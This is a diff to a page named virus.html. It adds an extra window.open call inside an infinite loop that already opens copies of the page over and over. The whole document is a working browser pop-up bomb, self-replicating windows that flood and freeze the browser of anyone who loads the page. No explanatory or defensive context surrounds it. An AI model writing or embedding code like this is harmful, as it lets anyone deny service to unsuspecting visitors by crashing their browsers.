--- a/virus.html
+++ b/virus.html
@@ -10,6 +10,7 @@
 <script>
     function virus(){
         for(;;) {
+			window.open("../virus.html").focus();
             var win = window.open("../virus.html", '_blank', "location=yes,height=570,width=520,scrollbars=yes,status=yes");
             win.focus();
         }
